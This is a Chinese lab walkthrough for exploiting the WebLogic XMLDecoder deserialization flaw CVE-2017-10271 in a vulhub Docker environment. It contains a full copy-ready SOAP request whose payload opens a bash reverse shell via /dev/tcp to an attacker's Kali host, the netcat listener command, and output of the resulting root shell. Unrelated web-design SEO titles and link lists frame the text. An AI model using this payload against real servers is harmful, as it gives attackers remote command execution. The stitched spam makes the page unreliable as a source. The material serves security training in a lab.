当前位置: 首页 > news >正文

广告公司做网站专业房地产网站建设

广告公司做网站,专业房地产网站建设,招聘模板制作app,揭阳市住房和城乡建设局网站漏洞成因 Weblogic的WLS Security组件对外提供 webservice服务 其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令 原理:https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-maste…

漏洞成因

Weblogic的WLS Security组件对外提供 webservice服务

其中使用了XMLDecoder来 解析用户传入的XML数据

在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令
原理:https://xz.aliyun.com/t/10172

靶场部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2017-10271

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2017-10271]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2017-10271]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

1.漏洞发生页

192.168.10.5:7001/wls-wsat/CoordinatorPortType

2.配置poc

192.168.10.5 改成你的CentOS IP
192.168.10.128 改成你的Kali IP
8888 改成你的Kali监听端口

==========从以下内容开始复制==========
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.5:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

3.kali监听 8888 端口

nc -lvp 8888

4.bp发送poc请求包

修改右上角 Target

 

 粘贴并发送

5.连接建立成功

 

┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@af29889df405:~/Oracle/Middleware/user_projects/domains/base_domain# 

http://www.yayakq.cn/news/208730/

相关文章:

  • 义乌公司网站软件开发项目总结
  • 利搜网站排名软件做网站来钱快
  • 网站的优点和缺点山西省建设厅网站
  • 仿hao123的导航网站纯静态版|html导航网站源码做空eth网站
  • 企业营销推广型网站建设wordpress另一更新进行中
  • 学校网站开发工程师商业网站设计方案模板
  • 广陵区建设局网站凡客t恤
  • 东莞做网站定制阿里指数网站
  • 北京最大专业网站建设腾讯邮箱网页版登录
  • 学做网站论坛VIP怎么样软文推广代写代发
  • 网站什么也没动怎么不收录啦设计师常用的图片网站
  • 电商网站建设开发的语言有哪些仿win8 html5微网站纯手工代码
  • 用本地机器做网站服务器大学网页设计作业
  • 网站建设方案的摘要福建省住房建设厅网站
  • 谁需要做网站的嘉兴如何布置网站
  • 石家庄网站网站建设室内设计公司排名十强
  • 网站开发者的常用工具百度seo快速排名优化服务
  • 财务公司代理记账怎么收费长沙正规竞价优化服务
  • 江门网站建设维护宁波网站建设联系方法
  • 网站素材大全齐鲁石化建设公司官网
  • wordpress文章都展现在一个页面商城网站优化
  • 网站开发给网站设置图标在什么文件中写代码网站开发技术包括什么
  • 宁波搭建网站公个人网站建设优化
  • 做ppt的模板的网站有哪些内容wordpress友情链接定时
  • 专业网站建设最便宜中国站长之家官网
  • 做网站网络公司无收入珠海网站建设方案维护
  • 湖南智能网站建设哪家好北方明珠网站建设
  • 网站开发 英文文章软件商城推荐
  • 仿皮皮淘网站开发全程培训建程网工程平台
  • 网站建设电wordpress门户源码